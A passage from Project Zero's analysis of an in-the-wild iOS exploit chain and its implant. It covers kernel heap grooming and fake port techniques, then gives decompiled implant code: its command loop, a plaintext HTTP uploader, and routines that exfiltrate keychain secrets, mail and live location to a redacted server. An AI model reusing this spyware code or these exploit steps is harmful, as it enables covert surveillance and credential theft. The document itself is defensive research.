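}
```

A caller would use the returned reply_size to size the reply buffer before running the handler, which is why the reply allocation lands in a predictable zone.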

It just so happens that the serialized io_connect_method request message falls in kalloc.4096, and the reply message in kalloc.6144, the two zones which have been groomed.

Since both the request and reply message will be using inband structure buffers, the input and output structure buffers passed to the external method will point directly into the request and reply ipc_kmsg structures. Recalling the heap grooming earlier, they'll end up with the following layout:

This is the setup when the vulnerability is triggered; the goal here is to disclose the address of the target port. If the groom succeeded then the bad memmove in the external method will copy from the out-of-line ports descriptor which lies after the request message into the OSData object backing buffer which is after the reply ipc_kmsg structure.

After triggering the bug they read each of the sprayed OSData objects in turn, checking whether they appear to now contain something which looks like a kernel pointer:

for (int m = 0; m < 96; ++m) {
  sprintf(k_str_buf, "k_%d", m);
  max_len = 102400LL;
  if ( iosurface_get_property_wrapper(k_str_buf,
                                      property_value_buf,
                                      &max_len)) {
    found_at = memmem(property_value_buf,
                      max_len,
                      "\xFF\xFF\xFF",
                      3LL);
    if ( found_at ) {
      found_at = (int *)((char *)found_at - 1);
      disclosed_port_address = found_at[1] + ((__int64)*found_at << 32);
      break;
    }
  }
}
If this succeeds then they've managed to disclose the kernel address of the target_port ipc_port structure. As we've seen in the previous chains, this is one of the prerequisites for their fake kernel port technique.
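
As a simplified illustration of the scanning idea (not the attackers' exact arithmetic, which works on the two 32-bit halves around the memmem hit), the sketch below walks a buffer in 4-byte steps and returns the first little-endian 64-bit value whose top three bytes are all 0xFF. The function names and the sample pointer value are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assemble 8 bytes at p into a 64-bit value, least significant byte first. */
static uint64_t read_le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; --i)
        v = (v << 8) | p[i];
    return v;
}

/* Return the first value at a 4-byte-aligned offset whose top 24 bits are
 * all ones (the signature the memmem call above searches for), or 0 if the
 * buffer contains no such value. */
uint64_t find_kernel_pointer(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t off = 0; off + 8 <= len; off += 4) {
        uint64_t v = read_le64(buf + off);
        if ((v >> 40) == 0xFFFFFF)
            return v;
    }
    return 0;
}
```

Run over a buffer of 'A' filler bytes with one pointer-shaped value copied in, this returns that value and nothing else, because the filler never has 0xFF in its top bytes.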

try, try, try again

They begin setting up to trigger the bug a second time. They send another complex kalloc groomer to fill in holes in kalloc.4096 and kalloc.6144 then perform two more heap grooms in both those zones.

In a buffer which will be sent in a kalloc.4096 out-of-line memory descriptor they write two values:

+0x514 : kaddr_of_target_port
+0xd14 : kaddr_of_target_port_neighbour (either the port below or above target port)
The neighbour port kernel address will be below, unless the port below starts a 4k page, in which case it's above.

Both C and A here contain the out-of-line memory descriptor buffer with the disclosed port addresses.

They make a similar groom in kalloc.6144, alternating between an out-of-line ports descriptor with 0x201 entries, all of which are MACH_PORT_NULL, and an out-of-line memory descriptor buffer:

The out-of-line ports descriptors are sent to ports from the ports_b array, the out-of-line memory descriptors to ports from ports_d.
They then destroy the middle half of those middle ports (the middle C's and middle D's) and reclaim half of those freed, hopefully leaving the following heap layout:

They then trigger the overflow a second time:

The idea here is to read out of bounds into the kalloc.4096 out-of-line memory descriptor buffers which contain two port pointers, then write those values out-of-bounds off the end of the reply message, somewhere in one of those B out-of-line ports descriptors. They're again creating a situation where an out-of-line ports descriptor gets corrupted to have reference-holding pointers for which a reference was never taken.

Path to a fake kernel task port

Unlike the previous chains, they don't proceed to destroy the corrupted out-of-line ports descriptor. Instead they destroy their send right to target_port (the port which has had an extra port pointer written into an out-of-line ports descriptor). This means that the out-of-line ports descriptor now has the dangling port pointer, not the task's port namespace table. They destroy before_ports and after_ports then force a GC. Note that this means they no longer have a send right to the dangling ipc_port in their task's port namespace. They still retain their receive right to the port to which the corrupted out-of-line ports descriptor was sent though, so by receiving the message enqueued on that port they can regain the send right to the dangling port.

Ports in pipes

This time they proceed to directly try to reallocate the memory backing the target port with a pipe buffer, using the familiar fake port structure.

They fill all the pipe buffers with fake ports using the following context value:

magic << 32 | 0x80000000 | fd << 16 | port_index_on_page
They then receive all the messages containing the out-of-line ports descriptors, looking to see if any of them contain port rights. If any port is found here, then it's the dangling pointer to the target port.

They call mach_port_get_context on the received port and ensure that the upper 32-bits of the context value match the magic value (0x2333) which they set. From the lower 32-bits they determine which pipe fd owns the replacing buffer, and what the offset of the fake port is on that page.
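
To make the bit layout concrete, here is a small sketch of packing and unpacking such a context value. The expression and the magic value 0x2333 come from the text; the field widths (fd below bit 31, a 16-bit port index) and the function names are assumptions chosen so the fields cannot overlap.

```c
#include <assert.h>
#include <stdint.h>

#define CONTEXT_MAGIC 0x2333u       /* magic value named in the text */
#define CONTEXT_FLAG  0x80000000u   /* constant bit set in the low word */

/* Build magic << 32 | 0x80000000 | fd << 16 | port_index_on_page. */
uint64_t pack_context(uint32_t fd, uint32_t port_index)
{
    /* Assumed limits: keep fd clear of bit 31 and the index within 16 bits. */
    assert(fd < 0x8000u && port_index < 0x10000u);
    return ((uint64_t)CONTEXT_MAGIC << 32) | CONTEXT_FLAG |
           ((uint64_t)fd << 16) | port_index;
}

/* Check the upper 32 bits against the magic, then split the lower 32 bits.
 * Returns 1 and fills the outputs on a match, 0 otherwise. */
int unpack_context(uint64_t ctx, uint32_t *fd, uint32_t *port_index)
{
    if ((ctx >> 32) != CONTEXT_MAGIC)
        return 0;
    uint32_t low = (uint32_t)ctx;
    *fd = (low & 0x7FFFFFFFu) >> 16;
    *port_index = low & 0xFFFFu;
    return 1;
}
```

Reading the value back through the dangling port therefore tells them both that the replacement succeeded and which pipe buffer now backs the port.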

Everything from here proceeds as before. They build a fake clock port in the pipe buffer and use the clock_sleep_trap trick to determine the kASLR slide. They build a fake kernel task port; escape the sandbox, patch the platform policy, add the implant CDHash to the trust cache and spawn the implant as root.


Implant Teardown

30 August, 2019 - 02:03
Posted by Ian Beer, Project Zero

In the earlier posts we examined how the attackers gained unsandboxed code execution as root on iPhones. At the end of each chain we saw the attackers calling posix_spawn, passing the path to their implant binary which they dropped in /tmp. This starts the implant running in the background as root. There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system. 

The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds.

Before diving into the code let's take a look at some sample data from a test phone running the implant and communicating with a custom command and control server I developed. To be clear, I created this test specifically for the purposes of demonstrating what the implant enabled the attacker to do and the screenshots are from my device.  The device here is an iPhone 8 running iOS 12.

The implant has access to all the database files (on the victim’s phone) used by popular end-to-end encryption apps like Whatsapp, Telegram and iMessage. We can see here screenshots of the apps on the left, and on the right the contents of the database files stolen by the implant which contain the unencrypted, plain-text of the messages sent and received using the apps:

Whatsapp

Here's a conversation in Google Hangouts for iOS and the corresponding database file uploaded by the implant. With some basic SQL we can easily see the plain text of the messages, and even the URL of the images shared.

The implant can upload private files used by all apps on the device; here's an example of the plaintext contents of emails sent via Gmail, which are uploaded to the attacker's server:

Gmail
The implant also takes copies of the user's complete contacts database:

And takes copies of all their photos:

Real-time GPS tracking
The implant can also upload the user's location in real time, up to once per minute, if the device is online. Here's a real sample of live location data collected by the implant when I took a trip to Amsterdam with the implant running on a phone in my pocket:

The implant uploads the device's keychain, which contains a huge number of credentials and certificates used on and by the device. For example, the SSIDs and passwords for all saved wifi access points:

  <dict>
    <key>UUID</key>
    <string>3A9861A1-108E-4B3A-AAEC-C8C9DC79878E</string>
    <key>acct</key>
    <string>RandomHotelWifiNetwork</string>
    <key>agrp</key>
    <string>apple</string>
    <key>cdat</key>
    <date>2019-08-28T08:47:33Z</date>
    <key>class</key>
    <string>genp</string>
    <key>mdat</key>
    <date>2019-08-28T08:47:33Z</date>
    <key>musr</key>
    <data>
    </data>
    <key>pdmn</key>
    <string>ck</string>
    <key>persistref</key>
    <data>
    </data>
    <key>sha1</key>
    <data>
    1FcMkQWZGn3Iol70BW6hkbxQ2rQ=
    </data>
    <key>svce</key>
    <string>AirPort</string>
    <key>sync</key>
    <integer>0</integer>
    <key>tomb</key>
    <integer>0</integer>
    <key>v_Data</key>
    <data>
    YWJjZDEyMzQ=
    </data>
  </dict>
The v_Data field is the plain-text password, stored as base64:

$ echo YWJjZDEyMzQ= | base64 -D
abcd1234
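
For readers without the base64 tool to hand, the same decoding can be sketched in a few lines of C. This is a minimal decoder for the standard padded alphabet, written for illustration; b64_value and b64_decode are names introduced here, not part of any tool mentioned in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Map one base64 character to its 6-bit value, or -1 if it is invalid. */
static int b64_value(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode a padded base64 string into out. Returns the number of bytes
 * written, or -1 on malformed input or if out is too small. */
long b64_decode(const char *in, unsigned char *out, size_t out_cap)
{
    assert(in != NULL && out != NULL);
    size_t len = strlen(in);
    size_t n = 0;

    if (len % 4 != 0)
        return -1;
    for (size_t i = 0; i < len; i += 4) {
        unsigned long triple = 0;
        size_t pad = 0;
        for (size_t j = 0; j < 4; ++j) {
            char c = in[i + j];
            int v = 0;
            if (c == '=') {
                /* '=' may only close the final group, in position 3 or 4 */
                if (i + 4 != len || j < 2)
                    return -1;
                pad++;
            } else {
                if (pad)
                    return -1;           /* data after padding */
                v = b64_value(c);
                if (v < 0)
                    return -1;
            }
            triple = (triple << 6) | (unsigned long)v;
        }
        size_t nbytes = 3 - pad;
        if (nbytes > out_cap - n)
            return -1;
        out[n++] = (unsigned char)((triple >> 16) & 0xFF);
        if (nbytes > 1) out[n++] = (unsigned char)((triple >> 8) & 0xFF);
        if (nbytes > 2) out[n++] = (unsigned char)(triple & 0xFF);
    }
    return (long)n;
}
```

Passing the v_Data value from the keychain entry above yields the eight bytes of the password shown by the shell command.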
The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running. Here's an example using the Google OAuth token stored in the keychain being used to log in to the Gmail web interface on a separate machine:

The implant is embedded in the privilege escalation Mach-O file in the __DATA:__file section. 

From our analysis of the exploits, we know that the fake kernel task port (which gives kernel memory read and write) is always destroyed at the end of the kernel exploit. The implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in.

Using jtool we can view the entitlements the implant has. Remember, the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary's code signature to the kernel trust cache.

$ jtool --ent implant
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
  <key>keychain-access-groups</key>
  <array>
    <string>*</string>
  </array>
  <key>application-identifier</key>
  <string>$(AppIdentifierPrefix)$(CFBundleIdentifier)</string>
  <key></key>
  <true/>
  <key></key>
  <true/>
</dict>
</plist>
Many system services on iOS will try to check the entitlements of clients talking to them, and only allow clients with particular entitlements to perform certain actions. This is why, even though the implant is running as root and unsandboxed, it still requires a valid entitlements blob. They're assigning themselves three relevant entitlements:

keychain-access-groups is used to restrict access to secrets stored in the keychain; they've given themselves a wildcard value here.
The second entitlement enables the use of CoreLocation without explicit user consent, as long as Location Services is enabled.
The third entitlement allows retrieval of the device's phone number.

Reversing

The binary is compiled without optimizations and written in Objective-C. The code snippets here are mostly manually decompiled with a bit of help from hex-rays.

Structure

The implant consists of two Objective-C classes: Service and Util and a variety of helper functions.

The implant starts by creating an instance of the Service class and calling the start selector before getting a handle to the current runloop and running it.

-[Service start] {
  [self startTimer];
  [self upload];
}

[Service startTimer] will ensure that the Service instance's timer_handle method is invoked every 60 seconds:

// call timer_handle every 60 seconds
-[Service startTimer] {
  timer = [NSTimer scheduledTimerWithTimeInterval:60.0
                                        target:self
                                        selector:SEL(timer_handle)
                                        userInfo:NULL
                                        repeats:1];
  old_timer = self->_timer;
  self->_timer = timer;
  [old_timer release];
}

timer_handle is the main function responsible for handling the command and control communication. Before the device goes into the timer_handle loop, however, it first does an initial upload:

-[Service upload] {
  [self uploadDevice];
  [self requestLocation];
  [self requestContacts];
  [self requestCallHistory];
  [self requestMessage];
  [self requestNotes];
  [self requestApps];
  [self requestKeychain];
  [self requestRecordings];
  [self requestSmsAttachments];
  [self requestSystemMail];
  if (!self->_defaultList) {
    self->_defaultList = [Util appPriorLists];
  }

  [self requestPriorAppData:self->_defaultList];
  [self requestPhotoData];
  ...
}
This performs an initial bulk upload of data from the device. Let's take a look at how these are implemented:

-[Service uploadDevice] {
  NSLog(@"uploadDevice");
  info = [Util dictOfDeviceInfo];
  while( [self postFiles:info remove:1] == 0) {
    [NSThread sleepForTimeInterval:10.0];
    info = [Util dictOfDeviceInfo];
  }
}

Note the call to NSLog is really there in the production implant. If you connect the iPhone via a lightning cable to a Mac and view the device's system log, you can see these log messages as the implant runs.

Here's [Util dictOfDeviceInfo]:

+[Util dictOfDeviceInfo] {
  struct utsname name = {};
  uname(&name);
  machine_str = [NSString stringWithCString:name.machine
                          encoding:NSUTF8StringEncoding];

  // CoreTelephony private API
  device_phone_number = CTSettingCopyMyPhoneNumber();
  if (!device_phone_number) {
    device_phone_number = @"";
  }

  net_str = @"Cellular";
  if ([self isWifi]) {
    net_str = @"Wifi";
  }

  dict = @{@"name":         [[UIDevice currentDevice] name],
           @"iccid":        [self ICCID],
           @"imei":         [self IMEI],
           @"SerialNumber": [self SerialNumber],
           @"PhoneNumber":  device_phone_number,
           @"version":      [[UIDevice currentDevice] systemVersion],
           @"totaldisk":    [NSNumber numberWithFloat:
                              [[self getTotalDiskSpace] stringValue]],
           @"freedisk":     [NSNumber numberWithFloat:
                              [[self getFreeDiskSpace] stringValue]],
           @"platform":     machine_str,
           @"net":          net_str};

  path = [@"/tmp" stringByAppendingPathComponent:[[NSUUID UUID] UUIDString]];

  [dict writeToFile:path atomically:1];

  return @{@"device.plist": path};
}
Here's the output which gets sent to the server when the implant is run on one of my test devices:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
  <key>PhoneNumber</key>
  <string>+447848473659</string>
  <key>SerialNumber</key>
  <string>F4GW60LKJC68</string>
  <key>freedisk</key>
  <string>48.63801</string>
  <key>iccid</key>
  <string>8944200115179096289</string>
  <key>imei</key>
  <string>352990092967294</string>
  <key>name</key>
  <string>Ian Beer’s iPhone</string>
  <key>net</key>
  <string>Wifi</string>
  <key>platform</key>
  <string>iPhone10,4</string>
  <key>totaldisk</key>
  <string>59.59484</string>
  <key>version</key>
  <string>12.1.2</string>
</dict>
</plist>
This method collects a myriad of identifiers from the device:
  • the iPhone model
  • the iPhone name ("Ian's iPhone")
  • the ICCID of the SIM card, which uniquely identifies the SIM
  • the iPhone serial number
  • the current phone number
  • the iOS version
  • total and free disk space
  • the currently active network interface (wifi or cellular)

They build an Objective-C dictionary object containing all this information then use the NSUUID class to generate a pseudo-random, unique string. They use that string to create a new file under /tmp, for example /tmp/68753A44-4D6F-1226-9C60-0050E4C00067. They serialize the dictionary object as XML to that file and return a dictionary @{@"device.plist": path} mapping the name "device.plist" to that path in /tmp. This rather odd design pattern of serializing everything to files in /tmp is used throughout the implant.

Let's take a look at how that file will get off the device and up to the attacker's server.

[Service uploadDevice] passes the returned @{@"device.plist": path} dictionary to [Service postFiles]:

  [self postFiles:info remove:1]

-[Service postFiles:files remove:remove] {
  if([[files allKeys] count] == 0) {
    return;
  }

  sem = dispatch_semaphore_create(0);

  base_url_str = [@"http://X.X.X.X" stringByTrimmingCharactersInSet:
                    [NSCharacterSet whitespaceAndNewlineCharacterSet]];

  full_url_str = [base_url_str stringByAppendingString:@"/upload/info"];

  url = [NSURL URLWithString:full_url_str];

  req = [NSMutableURLRequest requestWithURL:url];
  [req setHTTPMethod:@"POST"];
  [req setTimeoutInterval:120.0];

  content_type_str = [NSString stringWithFormat:
    @"multipart/form-data; charset=utf-8;boundary=%@", @"9ff7172192b7"];
  [req setValue:content_type_str forHTTPHeaderField:@"Content-Type"];

  // this is set in [Service init], it's SerialNumber
  // from [Util SerialNumber]
  params_dict = @{@"sn": self->_sn};
  body_data = [self buildBodyDataWithParams:params_dict AndFiles:files];

  session = [NSURLSession sharedSession];
  NSURLSessionUploadTask* task = [session uploadTaskWithRequest:req
           fromData:body_data
           completionHandler:
             ^(NSData *data, NSURLResponse *response, NSError *error){
                if (error) {
                  NSLog(@"postFile %@ Error: %@", _, _)
                } else {
                  NSLog(@"postFile success %@");
                }

                if (remove) {
                  // use NSFileManager to remove all the files
                }
             }];

  [task resume];

  dispatch_semaphore_wait(sem, -1);
}
The IP address of the server to upload content to is hardcoded in the implant binary. This function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string "9ff7172192b7" delimiting the fields in the body data.)

Let's take a quick look at buildBodyDataWithParams:

-[Service buildBodyDataWithParams:params AndFiles:files] {
  data = [NSMutableData data];
  for (key in params) {
    str = [NSMutableString string];
    // the boundary string
    [str appendFormat:@"--%@\r\n", @"9ff7172192b7"];
    [str appendFormat:
      @"Content-Disposition: form-data; name=\"%@\"\r\n\r\n", key];

    val = [params objectForKeyedSubscript:key];
    [str appendFormat:@"%@\r\n", val];

    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:encoded];
  }

  for (file in files) {
    str = [NSMutableString string];
    // the boundary string
    [str appendFormat:@"--%@\r\n", @"9ff7172192b7"];
    [str appendFormat:
      @"Content-disposition: form-data; name=\"%@\"; filename=\"%@\"\r\n",
      file, file];
    [str appendFormat:@"Content-Type: application/octet-stream\r\n\r\n"];

    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:encoded];

    file_path = [files objectForKeyedSubscript:file];
    file_data = [NSData dataWithContentsOfFile:file_path];
    [data appendData:file_data];

    newline_encoded = [@"\r\n" dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:newline_encoded];
  }

  final_str = [NSString stringWithFormat:@"--%@--\r\n", @"9ff7172192b7"];
  final_encoded = [final_str dataUsingEncoding:NSUTF8StringEncoding];
  [data appendData:final_encoded];

  return data;
}
This is just building a typical HTTP POST request body, embedding the contents of each file as form data.
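
To show the resulting wire format byte for byte, here is a minimal C sketch that assembles the same kind of body for one form parameter and one in-memory file. The boundary string and header lines mirror the decompiled method; build_body, its signature and the sample values are assumptions made for this illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define BOUNDARY "9ff7172192b7"   /* hardcoded boundary from the listing */

/* Write a multipart/form-data body with one text field and one file part
 * into out. Returns the body length, or 0 if it does not fit in cap bytes.
 * The result is raw bytes and is not NUL-terminated after the file data. */
size_t build_body(char *out, size_t cap,
                  const char *param_name, const char *param_value,
                  const char *file_name,
                  const char *file_data, size_t file_len)
{
    static const char tail[] = "\r\n--" BOUNDARY "--\r\n";
    const size_t tail_len = sizeof tail - 1;

    assert(out != NULL && cap > 0);

    /* Text field part, then the headers of the file part. */
    int n = snprintf(out, cap,
        "--" BOUNDARY "\r\n"
        "Content-Disposition: form-data; name=\"%s\"\r\n\r\n"
        "%s\r\n"
        "--" BOUNDARY "\r\n"
        "Content-disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n"
        "Content-Type: application/octet-stream\r\n\r\n",
        param_name, param_value, file_name, file_name);
    if (n < 0 || (size_t)n >= cap)
        return 0;

    size_t used = (size_t)n;
    if (file_len > cap - used || tail_len > cap - used - file_len)
        return 0;

    /* Raw file bytes, a CRLF, then the closing boundary. */
    memcpy(out + used, file_data, file_len);
    used += file_len;
    memcpy(out + used, tail, tail_len);
    used += tail_len;
    return used;
}
```

Every part, including the file contents, sits in the body exactly as given, with no encoding or encryption layer between the data and the wire.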

There's something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you're connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.

This means that not only is the end-point of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server.

The command loop

On initial run (immediately after the iPhone has been exploited) the implant performs around a dozen bulk uploads in a similar fashion before going to sleep and being woken up by the operating system every 60 seconds. Let's look at what happens then:

NSTimer will ensure that the [Service timer_handle] method is called every 60 seconds:

-[Service timer_handle] {
  NSLog(@"timer trig")
  [self status];
  [self cmds];
}
[Service status] uses the SystemConfiguration framework to determine whether the device is currently connected via WiFi or mobile data network.

[Service cmds] calls [Service remotelist]:

-[Service cmds] {
  NSLog(@"cmds");
  [self remotelist];
  NSLog(@"finally");
}

-[Service remotelist] {
  ws_nl = [NSCharacterSet whitespaceAndNewlineCharacterSet];
  url_str = [remote_url_long stringByTrimmingCharactersInSet:ws_nl];

  NSMutableURLRequestRef url_req = [NSMutableURLRequest alloc];

  full_url_str = [url_str stringByAppendingString:@"/list"];
  NSURLRef url = [NSURL URLWithString:full_url_str];

  [url_req initWithURL:url];

  if (self->_cookies) {
    [url_req addValue:self->_cookies forHTTPHeaderField:@"Cookie"];
  }

  NSURLResponse* resp;
  NSData* data = [NSURLConnection sendSynchronousRequest:url_req
     returningResponse:&resp
     error:0];

  cookie = [self getCookieFromHttpresponse:resp];
  if ([cookie length] != 0) {
    self->_cookie = cookie;
  }

  NSLog(@"Json data %@", [[NSString alloc] initWithData:data
                                   encoding:NSUTF8StringEncoding]);

  err = 0;
  json = [NSJSONSerialization JSONObjectWithData:data
                              options:0
                              error:&err];

  data_obj = [json objectForKey:@"data"];

  NSLog(@"data Result: %@", data_obj);

  cmds_obj = [data_obj objectForKey:@"cmds"];

  NSLog(@"cmds: %@", cmds_obj);

  for (cmd in cmds_obj) {
    [self doCommand:cmd];
  }
}
This method makes an HTTP request to the /list endpoint on the command and control server and expects to receive a JSON-encoded object in the response. It parses that object using the system JSON library (NSJSONSerialization), expecting the JSON to be in the following form:

{ "data" :
  { "cmds" :
    [
      {"cmd"  : <COMMAND_STRING>,
       "data" : <OPTIONAL_DATA_STRING>
      }, ...
    ]
  }
}

Each of the enclosed commands is passed in turn to [Service doCommand]:

-[Service doCommand:cmd_dict] {
  cmd_str_raw = [cmd_dict objectForKeyedSubscript:@"cmd"]

  cmd_str = [cmd_str_raw stringByTrimmingCharactersInSet:
               [NSCharacterSet whitespaceAndNewlineCharacterSet]];

  if ([cmd_str isEqualToString:@"systemmail"]) {
    [self requestSystemMail];
  } else if([cmd_str isEqualToString:@"device"]) {
    [self uploadDevice];
  } else if([cmd_str isEqualToString:@"locate"]) {
    [self requestLocation];
  } else if([cmd_str isEqualToString:@"contact"]) {
    [self requestContact];
  } else if([cmd_str isEqualToString:@"callhistory"]) {
    [self requestCallHistory];
  } else if([cmd_str isEqualToString:@"message"]) {
    [self requestMessage];
  } else if([cmd_str isEqualToString:@"notes"]) {
    [self requestNotes];
  } else if([cmd_str isEqualToString:@"applist"]) {
    [self requestApps];
  } else if([cmd_str isEqualToString:@"keychain"]) {
    [self requestKeychain];
  } else if([cmd_str isEqualToString:@"recordings"]) {
    [self requestRecordings];
  } else if([cmd_str isEqualToString:@"msgattach"]) {
    [self requestSmsAttachments];
  } else if([cmd_str isEqualToString:@"priorapps"]) {
    if (!self->_defaultList) {
      self->_defaultList = [Util appPriorLists]
    }
    [self requestPriorAppData:self->_defaultList]
  } else if([cmd_str isEqualToString:@"photo"]) {
    [self uploadPhoto];
  } else if([cmd_str isEqualToString:@"allapp"]) {
    dispatch_async(_dispatch_main_q, ^(app)
      {
        [self requestAllAppData:app]
      });
  } else if([cmd_str isEqualToString:@"app"]) {
    // parameter should be an array of bundle ids
    data = [cmd_dict objectForKey:@"data"]
    if ([data count] != 0) {
      [self requestPriorAppData:data]
    }
  } else if([cmd_str isEqualToString:@"dl"]) {
    [@"/tmp/evd." stringByAppendingString:
      [[[NSUUID UUID] UUIDString] substringToIndex: 4]]
    // it doesn't actually seem to do anything here
  } else if([cmd_str isEqualToString:@"shot"]) {
    // nop
  } else if([cmd_str isEqualToString:@"live"]) {
    // nop
  }

  cs = [NSCharacterSet whitespaceAndNewlineCharacterSet];
  server = [@"http://X.X.X.X:1234" stringByTrimmingCharactersInSet:cs];

  full_url_str = [server stringByAppendingString:@"/list/suc?name="];
  url = [NSURL URLWithString:[full_url_str stringByAppendingString:cmd_str]];
  NSLog(@"s_url: %@", url)

  req = [[NSMutableURLRequest alloc] initWithURL:url];
  if (self->_cookies) {
    [req addValue:self->_cookies forHTTPHeaderField:@"Cookie"];
  }

  id resp;
  [NSURLConnection sendSynchronousRequest:req
                   returningResponse: &resp
                   error: nil];

  resp_cookie = [self getCookieFromHttpresponse:resp]
  if ([resp_cookie length] == 0) {
    self->_cookie = nil;
  } else {
    self->_cookie = resp_cookie;
  }

  NSLog(@"cookies: %@", self->_cookie)
}
This method takes a dictionary with a command and an optional data argument. Here's a list of the supported commands:

systemmail  : upload email from the default Mail.app
device      : upload device identifiers
               (IMEI, phone number, serial number etc)
locate      : upload location from CoreLocation
contact     : upload contacts database
callhistory : upload phone call history
message     : upload iMessage/SMSes
notes       : upload notes made in Notes.app
applist     : upload a list of installed non-Apple apps
keychain    : upload passwords and certificates stored in the keychain
recordings  : upload voice memos made using the built-in voice memos app
msgattach   : upload SMS and iMessage attachments
priorapps   : upload app-container directories from hardcoded list of
               third-party apps if installed (appPriorLists)
photo       : upload photos from the camera roll
allapp      : upload container directories of all apps
app         : upload container directories of particular apps by bundle ID
dl          : unimplemented
shot        : unimplemented
live        : unimplemented
Each command is responsible for uploading its results to the server. After each command is complete a GET request is made to the /list/suc?name=X endpoint, where X is the name of the command which completed. A cookie containing the device serial number is sent along with the GET request.
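
The acknowledgement step can be sketched in C as follows: trim the command string the way the decompiled method does, check it against the command names listed above, and build the /list/suc?name=X URL. The helper names and the example server address (a reserved documentation address) are assumptions for this sketch; the real server address is hardcoded in the implant and redacted here.

```c
#include <assert.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Command names taken from the list in the text. */
static const char *const known_commands[] = {
    "systemmail", "device", "locate", "contact", "callhistory", "message",
    "notes", "applist", "keychain", "recordings", "msgattach", "priorapps",
    "photo", "allapp", "app", "dl", "shot", "live",
};

/* Copy src into dst with leading and trailing whitespace removed.
 * Returns 1 on success, 0 if the trimmed string does not fit. */
static int trim_copy(char *dst, size_t cap, const char *src)
{
    while (*src && isspace((unsigned char)*src))
        src++;
    size_t len = strlen(src);
    while (len > 0 && isspace((unsigned char)src[len - 1]))
        len--;
    if (len >= cap)
        return 0;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 1;
}

/* Return 1 if cmd is one of the command names above, 0 otherwise. */
int is_known_command(const char *cmd)
{
    assert(cmd != NULL);
    for (size_t i = 0; i < sizeof known_commands / sizeof known_commands[0]; ++i)
        if (strcmp(cmd, known_commands[i]) == 0)
            return 1;
    return 0;
}

/* Build "<server>/list/suc?name=<trimmed command>". Like the decompiled
 * method, this does not check whether the command was recognised.
 * Returns 1 on success, 0 if the result does not fit in cap bytes. */
int build_ack_url(char *out, size_t cap, const char *server, const char *raw_cmd)
{
    char cmd[32];

    assert(out != NULL && server != NULL && raw_cmd != NULL);
    if (!trim_copy(cmd, sizeof cmd, raw_cmd))
        return 0;
    int n = snprintf(out, cap, "%s/list/suc?name=%s", server, cmd);
    return n > 0 && (size_t)n < cap;
}
```

Note that the acknowledgement in the decompiled code sits after the if/else chain, so it appears to be sent whether or not the command name matched a branch.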

The majority of these commands work by creating tar archives of fixed lists of directories based on the desired information and the version of iOS which is running. Here, for example, is the implementation of the systemmail command:

-[Service requestSystemMail] {
  NSLog(@"requestSystemMail")
  maildir = [Util dirOfSystemMail]
  if ([maildir length] != 0) {
    [Util tarWithSplit:maildir
          name:@"systemmail"
          block:^(id files) // dictionary {filename:filepath}
          {
            while ([self postFiles:files] == 0) {
              [NSThread sleepForTimeInterval:10.0]
            }
          }
    ]
  }
}

+[Util dirOfSystemMail] {
  return @"/private/var/mobile/Library/Mail";
}

This uses the [Util tarWithSplit] method to archive the contents of the /private/var/mobile/Library/Mail folder, which contains the contents of all locally-stored email sent and received with the built-in Apple Mail app.

Here's another example of a command, locate, which uses CoreLocation to request a geolocation fix for the device. Because the implant has the CoreLocation entitlement described above set to true, this will not prompt the user for permission to access their location.

-[Service requestLocation] {
  NSLog(@"requestLocation");
  self->_locating = 1;

  if (!self->_lm) {
    lm = [[CLLocationManager alloc] init];
    [self->_lm release];
    self->_lm = lm;

    // the delegate's locationManager:didUpdateLocations: selector
    // will be called when location information is available
    [self->_lm setDelegate:self];
    [self->_lm setDesiredAccuracy:kCLLocationAccuracyBest];
  }

  [self->_lm startUpdatingLocation];
}

-[Service locationManager:manager didUpdateLocations:locations] {
  [self stopUpdatingLocation];
  loc = [locations lastObject];
  if (self->_locating) {
    struct CLLocationCoordinate2D coord = [loc coordinate];
    dict = @{@"lat" : [NSNumber numberWithDouble:coord.latitude],
             @"lon" : [NSNumber numberWithDouble:coord.longitude]};

    path = [@"/tmp" stringByAppendingPathComponent:[[NSUUID UUID] UUIDString]];
    [dict writeToFile:path atomically:1];

    while(1){
      fdict = @{@"gps.plist": path};
      if([self postFiles:fdict remove:1]) {
        break;
      }

      [NSThread sleepForTimeInterval:10.0];
    }
  }
}
Here's the response to the location command, which can be sent up to every 60 seconds (note: I have changed the location to be the peak of the Matterhorn in Switzerland):

<?xml version="1.0" encoding="UTF-8"?>
